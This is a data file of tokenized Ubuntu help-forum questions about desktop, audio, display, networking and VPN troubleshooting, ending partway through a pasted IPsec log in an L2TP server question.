299295	what is the `` dash '' ?	this may be a stupid or trivial question , but i am new to ubuntu , and have two unsolved problems ( flashplayer does n't play , and scanner does n't work - in virgin install 13.04 ) , so i started to search in documentation . in the 13.04 specific web site i was browsing the hardware section , and came across something like this : `` open dash , and select disk utilities '' . so what is dash , and where is disk utilities ? the application finder could not find any of those . in terminal the `` dash '' command seems to invoke some sort of a shell . p.s . the reason i repeated the title because the computer needed minimum 15 characters ( ... why ? ... )
299298	how can i change the mount point path while using udisks ?	how i can mount my disk with udisks to /media/ $ user/ % disk_title % instead of to /media/ % disk_title % ? when i try this : udisks -- mount /dev/sda1 it mounts to /media/ % disk_title % , but in gui ( file manager left-side panel ) , it mounts to /media/ $ user/ % disk_title % , how i can do this in terminal ?
299300	why has sound gone kaput after a reboot , and how can i get it back ?	this question has become irrelevant . see eta3 at bottom . following this ( which i 'd close if i knew how ) , i was forced to reboot , and now sound does n't work at all . chrome , mplayer , aplay , nothing . and googling 'ubuntu troubleshoot sound ' just makes things more confusing -- for instance , trying to open alsamixer just yields `` can not open mixer : no such file or directory '' . my volume is n't muted , either -- somehow it got set to maximum in the reboot . there are other weird things going on , too -- i do n't think system settings : sound : output is supposed to say `` dummy output '' under `` play sound through . '' i 'm sure there 's sense to be made out of this . i just ca n't make it . eta : behavior has persisted after another reboot ( which took several minutes longer than it should 've , if it matters ) . something 's broken here . eta2 : the last three blocks of the latest history.log are as follows . sorry for the scroll bar ; could n't figure out how to preserve single line breaks with blockquotes . start-date : 2012-05-22 11:48:12 commandline : aptdaemon role='role-commit-packages ' sender=':1.423' upgrade : ubuntu-docs : amd64 ( 12.04.4 , 12.04.5 ) , libxml2-utils : amd64 ( 2.7.8.dfsg-5.1ubuntu4 , 2.7.8.dfsg-5.1ubuntu4.1 ) , linux-headers-3.2.0-24 : amd64 ( 3.2.0-24.37 , 3.2.0-24.38 ) , linux-image-3.2.0-24-generic : amd64 ( 3.2.0-24.37 , 3.2.0-24.38 ) , linux-headers-3.2.0-24-generic : amd64 ( 3.2.0-24.37 , 3.2.0-24.38 ) , ubuntu-sso-client-qt : amd64 ( 3.0.0-0ubuntu1 , 3.0.0-0ubuntu2 ) , libxml2 : amd64 ( 2.7.8.dfsg-5.1ubuntu4 , 2.7.8.dfsg-5.1ubuntu4.1 ) , libxml2 : i386 ( 2.7.8.dfsg-5.1ubuntu4 , 2.7.8.dfsg-5.1ubuntu4.1 ) , libxml2-dbg : amd64 ( 2.7.8.dfsg-5.1ubuntu4 , 2.7.8.dfsg-5.1ubuntu4.1 ) , python-ubuntu-sso-client : amd64 ( 3.0.0-0ubuntu1 , 3.0.0-0ubuntu2 ) , ubuntu-sso-client : amd64 ( 3.0.0-0ubuntu1 , 3.0.0-0ubuntu2 ) , linux-libc-dev : amd64 ( 3.2.0-24.37 , 3.2.0-24.38 ) , python-libxml2 : amd64 ( 2.7.8.dfsg-5.1ubuntu4 , 2.7.8.dfsg-5.1ubuntu4.1 ) end-date : 2012-05-22 11:58:09 start-date : 2012-05-24 08:11:45 commandline : aptdaemon role='role-commit-packages ' sender=':1.475' upgrade : libsnmp15 : amd64 ( 5.4.3~dfsg-2.4ubuntu1 , 5.4.3~dfsg-2.4ubuntu1.1 ) , postfix : amd64 ( 2.9.1-4 , 2.9.1-5 ) , linux-headers-3.2.0-24 : amd64 ( 3.2.0-24.38 , 3.2.0-24.39 ) , linux-image-3.2.0-24-generic : amd64 ( 3.2.0-24.38 , 3.2.0-24.39 ) , libutouch-geis1 : amd64 ( 2.2.9-0ubuntu2 , 2.2.9-0ubuntu3 ) , linux-headers-3.2.0-24-generic : amd64 ( 3.2.0-24.38 , 3.2.0-24.39 ) , libsnmp-base : amd64 ( 5.4.3~dfsg-2.4ubuntu1 , 5.4.3~dfsg-2.4ubuntu1.1 ) , vino : amd64 ( 3.4.1-0ubuntu1 , 3.4.2-0ubuntu1 ) , google-chrome-beta : amd64 ( 19.0.1084.46-r135956 , 20.0.1132.11-r137611 ) , resolvconf : amd64 ( 1.63ubuntu11 , 1.63ubuntu14 ) , linux-libc-dev : amd64 ( 3.2.0-24.38 , 3.2.0-24.39 ) end-date : 2012-05-24 08:21:07 start-date : 2012-05-25 08:33:31 commandline : aptdaemon role='role-commit-packages ' sender=':1.511' install : ubuntu-sso-client-gtk : amd64 ( 3.0.0-0ubuntu2 ) upgrade : nautilus : amd64 ( 3.4.1-0ubuntu1 , 3.4.2-0ubuntu1 ) , libatspi2.0-0 : amd64 ( 2.4.1-0ubuntu0.1 , 2.4.2-0ubuntu0.1 ) , python-gobject-dbg : amd64 ( 3.2.0-3 , 3.2.2-1~precise ) , at-spi2-core : amd64 ( 2.4.1-0ubuntu0.1 , 2.4.2-0ubuntu0.1 ) , xserver-xorg-core : amd64 ( 1.11.4-0ubuntu10.1 , 1.11.4-0ubuntu10.2 ) , xserver-common : amd64 ( 1.11.4-0ubuntu10.1 , 1.11.4-0ubuntu10.2 ) , nautilus-dbg : amd64 ( 3.4.1-0ubuntu1 , 3.4.2-0ubuntu1 ) , software-center : amd64 ( 5.2.1 , 5.2.2 ) , python-gi : amd64 ( 3.2.0-3 , 3.2.2-1~precise ) , python-gi-dbg : amd64 ( 3.2.0-3 , 3.2.2-1~precise ) , libssl-dev : amd64 ( 1.0.1-4ubuntu5 , 1.0.1-4ubuntu5.2 ) , libssl-doc : amd64 ( 1.0.1-4ubuntu5 , 1.0.1-4ubuntu5.2 ) , gir1.2-atspi-2.0 : amd64 ( 2.4.1-0ubuntu0.1 , 2.4.2-0ubuntu0.1 ) , python-gi-cairo : amd64 ( 3.2.0-3 , 3.2.2-1~precise ) , nautilus-data : amd64 ( 3.4.1-0ubuntu1 , 3.4.2-0ubuntu1 ) , python-gobject : amd64 ( 3.2.0-3 , 3.2.2-1~precise ) , google-chrome-beta : amd64 ( 20.0.1132.11-r137611 , 20.0.1132.17-r138701 ) , openssl : amd64 ( 1.0.1-4ubuntu5 , 1.0.1-4ubuntu5.2 ) , libnautilus-extension1a : amd64 ( 3.4.1-0ubuntu1 , 3.4.2-0ubuntu1 ) , xserver-xorg-input-synaptics : amd64 ( 1.5.99.902-0ubuntu5.1 , 1.6.0-0ubuntu1~precise1 ) , libssl1.0.0 : amd64 ( 1.0.1-4ubuntu5 , 1.0.1-4ubuntu5.2 ) , libssl1.0.0 : i386 ( 1.0.1-4ubuntu5 , 1.0.1-4ubuntu5.2 ) end-date : 2012-05-25 08:39:11 eta3 : the result of githlar 's tip may be found here .
299305	microphone not working on ubuntu 12.04 with asus eee pc 1000he	help , friends ! i am lost , and know not what to do ... i have both pulseaudio and the alsa-mixer running on my asus eee pc 1000he , and while the speaker sound is fine , the microphone has majorly whoo-hooed . if i open up the sound settings , i notice that the mic is getting a lot of input . recordings just sound like a huge hiss . this makes it impossible to use ... well , anything with a microphone . i do n't even know where to start on this one -- has anyone gotten similar problems ? how can i start getting information to solve it ? thanks !
299307	chaning permission of wireless device wlan0	i want to be able to change the permission of wlan0 so that i can use tcpdump to listen on it without elevating myself to root . currently : tcpdump -i wlan0 gives : tcpdump : wlan0 : you do n't have permission to capture on that device when i do : sudo tcpdump -i wlan0 it works as expected .
299312	skype ca n't connect with mobile broadband internet	i now use a mobile broadband key to connect to the internet . i had to manually configure it to work , and all internet apps ( firefox , kmess , etc ) , work well . except for skype . when i try to log in , it thinks for 5 minutes before saying `` connection error '' . i run ubuntu 12.04 , and skype was downloaded from the software centre . skype still signs in when i have a wifi or wired internet connection . any suggestions ? ? ps , i 'm not very good with the terminal app !
299314	unity crash to a blue screen after login	i recently updated to 12.10 quintal and to my surprise the desktop wo n't load . after logging in it brings up my wallpaper for a while then it turns to a plain blue screen . after all this i have to ctrl-alt-f1 and use terminal to get out . i know unity 2d is no longer supported and i 'm not sure my graphics card can support the opengl that the desktop needs . it 's a nividia geforce fx 5200 128mb . i 've done research and nothing of my problem occurs . i can switch to classic gnome but i would prefer unity but if that 's not possible then idk . plz help !
299321	create dsl connection on xububtu 12.04	how do create dsl connection on xububtu 12.04 ? i have been provided with a username , password and 2 dns settings ( prefeired and alternative ) . on windows i could key in all info and connect within seconds . in xubuntu i use sudo pppoeconf to key in username and password . then manually type 2 dns nameserver in with sudo gedit /etc/resolv.conf and try to connect . the connection was not established , please help if anybody can .
299326	hangouts webapp in chrome linux version	recently i installed chrome v27 in my ubuntu 13.04 ( 32 bit ) desktop os . then installed few extensions , one of them is `` hangouts '' for chrome webapp ... in my windows version of chrome app , i am able to `` signout '' from the hangouts extension , but in my linux version of chrome i 'm not able to do so . i had to remove it if i want to signout . anyone facing this behaviour like me ?
299333	wd external hd no working	i have a password protection on my external hdd and in windows i 'm always prompted to input the password when i connect my external hdd to it . but in ubuntu it mounts fine but it does not request me to input a password and i dont have access to any of my files on the external hdd please help !
299334	change icon with launcher api	with launcher api provided by libunity i can add a counter or a progress-bar to my application icon . but i would also like to change the icon it self or the name of the application . is this possible ? background : the application creates snapshot backups . the backup process will be shown with a progress-bar . every now and then the application need to clean up old snapshots . for this i would like to change the icon e.g . to a broom and run a new progress-bar for the clean-up .
299337	xrandr reports size `` not found in available modes '' when coming from wine	my monitor 's native resolution is 1680x1050 . i can switch to another resolution with xrandr -s 1280x960 and then switch back with xrandr -s 1680x1050 without a problem . however , if i run xcom : enemy unknown with wine , it switches the resolution to 1280x960 , and then when i exit , it never resets the resolution back . if i then try to use the same xrandr -s 1680x1050 command , i get : size 1680x1050 not found in available modes in order to get back my native resolution , i need to use nvidia-settings . ( after switching back , xrandr starts working again . ) any idea how to get xrandr to work in this situation ? or , even better , how can i get wine to stop dumping me in 1280x960 mode ? setup : xubuntu 12.10 xfce 4.10 , compositing disabled nvidia geforce gt 240 , driver 304.88 wine 1.5.30 xrandr reports screen 0 : minimum 8 x 8 , current 1680 x 1050 , maximum 8192 x 8192 dvi-i-0 disconnected ( normal left inverted right x axis y axis ) vga-0 disconnected ( normal left inverted right x axis y axis ) dvi-i-1 connected 1680x1050+0+0 ( normal left inverted right x axis y axis ) 433mm x 270mm 1680x1050 60.0*+ 1280x1024 75.0 60.0 1280x960 60.0 1152x864 75.0 1024x768 75.0 70.1 60.0 800x600 75.0 72.2 60.3 56.2 640x480 75.0 72.8 59.9 640x400 70.1 hdmi-0 disconnected ( normal left inverted right x axis y axis ) edit : if i use xrandr -- verbose after exiting the game , i note that i can change to any resolution / refresh rate that has +hsync but not any that has -hsync ( which is what my 1680x1050 hash ) .
299338	ubuntu 12.04 alternatively disable network adapter	i recently installed ubuntu 12.04 lts . i 'm facing the following 2 problems that i do n't understand how to solve it : wireless connection was running normally when i installed the ubuntu without the need of any additional driver , however on the next day it just stopped to detect any available wireless connection . due to 1st problem , i connected my pc to my internet huddle with cable . it works pretty smoothly , but on the next day it stopped working working again ( i did installed 2 new language package on that day - korean and chinese simplify ) . and what confused me even more is that suddenly my wireless connection started to work again . it is like the os alternatively disable & enable all my network adapter . i 'm new to ubuntu or linux in general , i do n't know what configuration i have to do . what are the information i need to provide here in order to understand & solve my problem ? connectors details : wireless : d-link wireless n 150 usb adapter huddle : yes huddle 4g mobile hotspot ( from http : //www.yes.my/v3/personal/devices/huddle.do ) other details : sudo rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : no
299339	unity does n't load	before this , all was alright then i was installing ati/amd drivers to have hdmi sound in my tv , all was installing fine but then i restart my computer and unity was gone : menu , bar , and all that things where gone . i donâ´t know what to do to make it work again . i have try the classic solution : dconf reset -f /org/compiz/ and then appears : ( dconf:3470 ) : glib-warning ** : ( /bulid/bulid/glib2.0-2.36.0/./glib/gerror.c:390 ) : g_error_new_valist : runtime check failed : ( domain ! =0 ) error : dconf path must begin with slash ... i try to enable unity with ccsm but it says that opengl is needed and canâ´t enable it . i do n't know what to do .
299340	shell not handling escape character spaces	recently it seems that shell has changed how it handles spaces in parameters . it used to handle them properly ( or at least as i intended it to ) , but now it recognises it as a bunch of different parameters and completely misses the escape character . an example of a small script that used to work very well : # ! /bin/sh exec /home/evan/.applications/sublime\ text\ 2/sublime_text $ 1 so i would give it some filepath with spaces and it used to open the proper file eg , /home/evan/document/my\ file\ path/file.txt would open that file.txt . now it opens `` my '' , `` file '' , `` path '' , and some unknown `` file.txt '' obviously , that wo n't be the file.txt that i am looking for . any help would be appreciated . thank you in advance . os : ubuntu 13.04 gnome edition with latest updates edit : i forgot to mention that the command executes perfect . the parameter does not .
299344	transfer files between ubuntu machines without ssh	how do i transfer files between ubuntu machines without ssh
299345	how to enable webgl in chrome on ubuntu ?	chrome : //gpu/ and http : //webglreport.com/ google-chrome -- version google chrome 27.0.1453.93 http : //www.chromeexperiments.com/webgl how to enable webgl in chrome on ubuntu ?
299349	i want to buy a portable 1tb hdd	i want to buy a portable 1tb hdd , which should be supportable in ubuntu as well as microsoft windows ( xp and above ) . can any one suggest me a good hdd ?
299356	ipsec l2tp vpn server on ubuntu ; ipsec sa established , but tunnel does n't work	i want to setup a l2tp vpn on ubuntu raring ( 13.04 ) in order to connect to my home network . i was able to successfully establish ipsec sa but tunneling does n't seem to be worked : ( i have disabled firewall on both server and my router and tried to connect to vpn from outside network ( using windows 7 and windows 8 ) and from the lan ( just to check ) also using windows xp machine , but no luck at all . in all the times i got successful ipsec sa but no tunnelling through virtual ip . in this particular test setup , the vpn server has two interfaces with ips 10.2.3.252 and 10.2.3.250 . the one , 10.2.3.252 is used in ipsec vpn configuration . router / gateway ip is 10.2.3.254 . i want connecting clients to have ips starting from 10.2.3.51 to 10.2.3.74 i have attached all the configuration files that i used in this setup and also the output of the /var/log/auth.log kindly go through them and let me know if there is anything wrong or any modification need to done in order to make this vpn setup works . thank you in advance . here are the configuration files : /etc/ipsec.conf : version 2.0 # conforms to second version of ipsec.conf specification # basic configuration config setup dumpdir=/var/run/pluto/ nat_traversal=yes virtual_private= % v4:10.2.3.0/24 oe=off protostack=netkey conn l2tp-psk-nat rightsubnet=vhost : % priv also=l2tp-psk-nonat conn l2tp-psk-nonat authby=secret pfs=no auto=add keyingtries=3 rekey=no ikelifetime=8h keylife=24h type=transport left=10.2.3.252 leftnexthop=10.2.3.254 leftprotoport=17/1701 right= % any rightprotoport=17/ % any /etc/ipsec.secrets : 10.2.3.252 % any : psk `` yoursharedsecret '' /etc/xl2tpd/xl2tpd.conf : [ global ] ipsec saref = yes [ lns default ] ip range = 10.2.3.51-10.2.3.74 local ip = 10.2.3.50 refuse chap = yes refuse pap = yes require authentication = yes ppp debug = yes pppoptfile = /etc/ppp/options.xl2tpd length bit = yes /etc/ppp/options.xl2tpd : require-mschap-v2 ms-dns 8.8.8.8 ms-dns 8.8.4.4 asyncmap 0 auth crtscts lock hide-password modem debug name l2tpd proxyarp lcp-echo-interval 30 lcp-echo-failure 4 /etc/ppp/chap-secrets : # client server secret ip addresses test l2tpd testpassword * additionally , i ran the following the shell and then restart the services , xl2tpd and ipsec . for each in /proc/sys/net/ipv4/conf/* do echo 0 > $ each/accept_redirects echo 0 > $ each/send_redirects done here are the output from /var/log/auth.log : trying to connect from lan ; may 24 11:22:00 vpngw pluto [ 4571 ] : packet from 10.2.3.3:500 : ignoring vendor id payload [ ms nt5 isakmpoakley 00000004 ] may 24 11:22:00 vpngw pluto [ 4571 ] : packet from 10.2.3.3:500 : ignoring vendor id payload [ fragmentation ] may 24 11:22:00 vpngw pluto [ 4571 ] : packet from 10.2.3.3:500 : received vendor id payload [ draft-ietf-ipsec-nat-t-ike-02_n ] method set to=106 may 24 11:22:00 vpngw pluto [ 4571 ] : packet from 10.2.3.3:500 : ignoring vendor id payload [ vid-initial-contact ] may 24 11:22:00 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 2 ] 10.2.3.3 # 3 : responding to main mode from unknown peer 10.2.3.3 may 24 11:22:00 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 2 ] 10.2.3.3 # 3 : transition from state state_main_r0 to state state_main_r1 may 24 11:22:00 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 2 ] 10.2.3.3 # 3 : state_main_r1 : sent mr1 , expecting mi2 may 24 11:22:01 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 2 ] 10.2.3.3 # 3 : nat-traversal : result using draft-ietf-ipsec-nat-t-ike-02/03 : no nat detected may 24 11:22:01 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 2 ] 10.2.3.3 # 3 : transition from state state_main_r1 to state state_main_r2 may 24 11:22:01 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 2 ] 10.2.3.3 # 3 : state_main_r2 : sent mr2 , expecting mi3 may 24 11:22:01 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 2 ] 10.2.3.3 # 3 : main mode peer id is id_ipv4_addr : '10.2.3.3' may 24 11:22:01 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 2 ] 10.2.3.3 # 3 : transition from state state_main_r2 to state state_main_r3 may 24 11:22:01 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 2 ] 10.2.3.3 # 3 : state_main_r3 : sent mr3 , isakmp sa established { auth=oakley_preshared_key cipher=oakley_3des_cbc_192 prf=oakley_sha group=modp2048 } may 24 11:22:01 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 2 ] 10.2.3.3 # 3 : the peer proposed : 10.2.3.252/32:17/1701 - > 10.2.3.3/32:17/0 may 24 11:22:01 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 2 ] 10.2.3.3 # 4 : responding to quick mode proposal { msgid:8a722dec } may 24 11:22:01 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 2 ] 10.2.3.3 # 4 : us : 10.2.3.252 < 10.2.3.252 > :17/1701 -- -10.2.3.254 may 24 11:22:01 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 2 ] 10.2.3.3 # 4 : them : 10.2.3.3:17/1701 may 24 11:22:01 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 2 ] 10.2.3.3 # 4 : transition from state state_quick_r0 to state state_quick_r1 may 24 11:22:01 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 2 ] 10.2.3.3 # 4 : state_quick_r1 : sent qr1 , inbound ipsec sa installed , expecting qi2 may 24 11:22:01 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 2 ] 10.2.3.3 # 4 : transition from state state_quick_r1 to state state_quick_r2 may 24 11:22:01 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 2 ] 10.2.3.3 # 4 : state_quick_r2 : ipsec sa established transport mode { esp= > 0x74edcc2b < 0xfd07061c xfrm=3des_0-hmac_md5 natoa=none natd=none dpd=none } may 24 11:22:36 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 2 ] 10.2.3.3 # 3 : received delete sa ( 0x74edcc2b ) payload : deleting ipsec state # 4 may 24 11:22:36 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 2 ] 10.2.3.3 # 3 : received and ignored informational message may 24 11:22:36 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 2 ] 10.2.3.3 # 3 : received delete sa payload : deleting isakmp state # 3 may 24 11:22:36 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 2 ] 10.2.3.3 : deleting connection `` l2tp-psk-nat '' instance with peer 10.2.3.3 { isakmp= # 0/ipsec= # 0 } may 24 11:22:36 vpngw pluto [ 4571 ] : packet from 10.2.3.3:500 : received and ignored informational message trying to connect from wan / from different network ; may 24 11:25:46 vpngw pluto [ 4571 ] : packet from 175.157.198.74:15682 : ignoring unknown vendor id payload [ 01528bbbc00696121849ab9a1c5b2a5100000001 ] may 24 11:25:46 vpngw pluto [ 4571 ] : packet from 175.157.198.74:15682 : ignoring vendor id payload [ ms nt5 isakmpoakley 00000009 ] may 24 11:25:46 vpngw pluto [ 4571 ] : packet from 175.157.198.74:15682 : received vendor id payload [ rfc 3947 ] method set to=115 may 24 11:25:46 vpngw pluto [ 4571 ] : packet from 175.157.198.74:15682 : received vendor id payload [ draft-ietf-ipsec-nat-t-ike-02_n ] meth=106 , but already using method 115 may 24 11:25:46 vpngw pluto [ 4571 ] : packet from 175.157.198.74:15682 : ignoring vendor id payload [ fragmentation ] may 24 11:25:46 vpngw pluto [ 4571 ] : packet from 175.157.198.74:15682 : ignoring vendor id payload [ ms-negotiation discovery capable ] may 24 11:25:46 vpngw pluto [ 4571 ] : packet from 175.157.198.74:15682 : ignoring vendor id payload [ vid-initial-contact ] may 24 11:25:46 vpngw pluto [ 4571 ] : packet from 175.157.198.74:15682 : ignoring vendor id payload [ ike cga version 1 ] may 24 11:25:46 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 5 ] 175.157.198.74 # 11 : responding to main mode from unknown peer 175.157.198.74 may 24 11:25:46 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 5 ] 175.157.198.74 # 11 : oakley_group 20 not supported . attribute oakley_group_description may 24 11:25:46 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 5 ] 175.157.198.74 # 11 : oakley_group 19 not supported . attribute oakley_group_description may 24 11:25:46 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 5 ] 175.157.198.74 # 11 : transition from state state_main_r0 to state state_main_r1 may 24 11:25:46 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 5 ] 175.157.198.74 # 11 : state_main_r1 : sent mr1 , expecting mi2 may 24 11:25:47 vpngw pluto [ 4571 ] : packet from 175.157.198.74:15682 : ignoring unknown vendor id payload [ 01528bbbc00696121849ab9a1c5b2a5100000001 ] may 24 11:25:47 vpngw pluto [ 4571 ] : packet from 175.157.198.74:15682 : ignoring vendor id payload [ ms nt5 isakmpoakley 00000009 ] may 24 11:25:47 vpngw pluto [ 4571 ] : packet from 175.157.198.74:15682 : received vendor id payload [ rfc 3947 ] method set to=115 may 24 11:25:47 vpngw pluto [ 4571 ] : packet from 175.157.198.74:15682 : received vendor id payload [ draft-ietf-ipsec-nat-t-ike-02_n ] meth=106 , but already using method 115 may 24 11:25:47 vpngw pluto [ 4571 ] : packet from 175.157.198.74:15682 : ignoring vendor id payload [ fragmentation ] may 24 11:25:47 vpngw pluto [ 4571 ] : packet from 175.157.198.74:15682 : ignoring vendor id payload [ ms-negotiation discovery capable ] may 24 11:25:47 vpngw pluto [ 4571 ] : packet from 175.157.198.74:15682 : ignoring vendor id payload [ vid-initial-contact ] may 24 11:25:47 vpngw pluto [ 4571 ] : packet from 175.157.198.74:15682 : ignoring vendor id payload [ ike cga version 1 ] may 24 11:25:47 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 5 ] 175.157.198.74 # 12 : responding to main mode from unknown peer 175.157.198.74 may 24 11:25:47 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 5 ] 175.157.198.74 # 12 : oakley_group 20 not supported . attribute oakley_group_description may 24 11:25:47 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 5 ] 175.157.198.74 # 12 : oakley_group 19 not supported . attribute oakley_group_description may 24 11:25:47 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 5 ] 175.157.198.74 # 12 : transition from state state_main_r0 to state state_main_r1 may 24 11:25:47 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 5 ] 175.157.198.74 # 12 : state_main_r1 : sent mr1 , expecting mi2 may 24 11:25:47 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 5 ] 175.157.198.74 # 11 : nat-traversal : result using draft-ietf-ipsec-nat-t-ike ( macos x ) : both are nated may 24 11:25:47 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 5 ] 175.157.198.74 # 11 : transition from state state_main_r1 to state state_main_r2 may 24 11:25:47 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 5 ] 175.157.198.74 # 11 : state_main_r2 : sent mr2 , expecting mi3 may 24 11:25:47 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 5 ] 175.157.198.74 # 11 : main mode peer id is id_ipv4_addr : '10.217.185.32' may 24 11:25:47 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 5 ] 175.157.198.74 # 11 : switched from `` l2tp-psk-nat '' to `` l2tp-psk-nat '' may 24 11:25:47 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 11 : transition from state state_main_r2 to state state_main_r3 may 24 11:25:47 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 11 : new nat mapping for # 11 , was 175.157.198.74:15682 , now 175.157.198.74:15338 may 24 11:25:47 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 11 : state_main_r3 : sent mr3 , isakmp sa established { auth=oakley_preshared_key cipher=aes_256 prf=oakley_sha group=modp2048 } may 24 11:25:48 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 11 : the peer proposed : 112.135.135.239/32:17/1701 - > 10.217.185.32/32:17/0 may 24 11:25:48 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 11 : nat-traversal : received 2 nat-oa . using first , ignoring others may 24 11:25:48 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 13 : responding to quick mode proposal { msgid:01000000 } may 24 11:25:48 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 13 : us : 10.2.3.252 < 10.2.3.252 > :17/1701 -- -10.2.3.254 may 24 11:25:48 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 13 : them : 175.157.198.74 [ 10.217.185.32 ] :17/1701===10.217.185.32/32 may 24 11:25:48 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 13 : transition from state state_quick_r0 to state state_quick_r1 may 24 11:25:48 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 13 : state_quick_r1 : sent qr1 , inbound ipsec sa installed , expecting qi2 may 24 11:25:48 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 13 : transition from state state_quick_r1 to state state_quick_r2 may 24 11:25:48 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 13 : state_quick_r2 : ipsec sa established transport mode { esp= > 0x7bf3baec < 0x50dc42a3 xfrm=aes_128-hmac_sha1 natoa=10.217.185.32 natd=175.157.198.74:15338 dpd=none } may 24 11:25:48 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 11 : the peer proposed : 112.135.135.239/32:17/1701 - > 10.217.185.32/32:17/1701 may 24 11:25:48 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 11 : nat-traversal : received 2 nat-oa . using first , ignoring others may 24 11:25:48 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 14 : responding to quick mode proposal { msgid:02000000 } may 24 11:25:48 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 14 : us : 10.2.3.252 < 10.2.3.252 > :17/1701 -- -10.2.3.254 may 24 11:25:48 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 14 : them : 175.157.198.74 [ 10.217.185.32 ] :17/1701===10.217.185.32/32 may 24 11:25:48 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 14 : keeping refhim=4294901761 during rekey may 24 11:25:48 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 14 : transition from state state_quick_r0 to state state_quick_r1 may 24 11:25:48 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 14 : state_quick_r1 : sent qr1 , inbound ipsec sa installed , expecting qi2 may 24 11:25:48 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 14 : transition from state state_quick_r1 to state state_quick_r2 may 24 11:25:48 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 14 : state_quick_r2 : ipsec sa established transport mode { esp= > 0xa06b29f8 < 0x03847f7d xfrm=aes_128-hmac_sha1 natoa=10.217.185.32 natd=175.157.198.74:15338 dpd=none } may 24 11:25:48 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 11 : received delete sa ( 0x7bf3baec ) payload : deleting ipsec state # 13 may 24 11:25:48 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 11 : received and ignored informational message may 24 11:25:51 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 11 : the peer proposed : 112.135.135.239/32:17/1701 - > 10.217.185.32/32:17/1701 may 24 11:25:51 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 11 : nat-traversal : received 2 nat-oa . using first , ignoring others may 24 11:25:51 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 15 : responding to quick mode proposal { msgid:03000000 } may 24 11:25:51 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 15 : us : 10.2.3.252 < 10.2.3.252 > :17/1701 -- -10.2.3.254 may 24 11:25:51 vpngw pluto [ 4571 ] : `` l2tp-psk-nat '' [ 6 ] 175.157.198.74 # 15 : them : 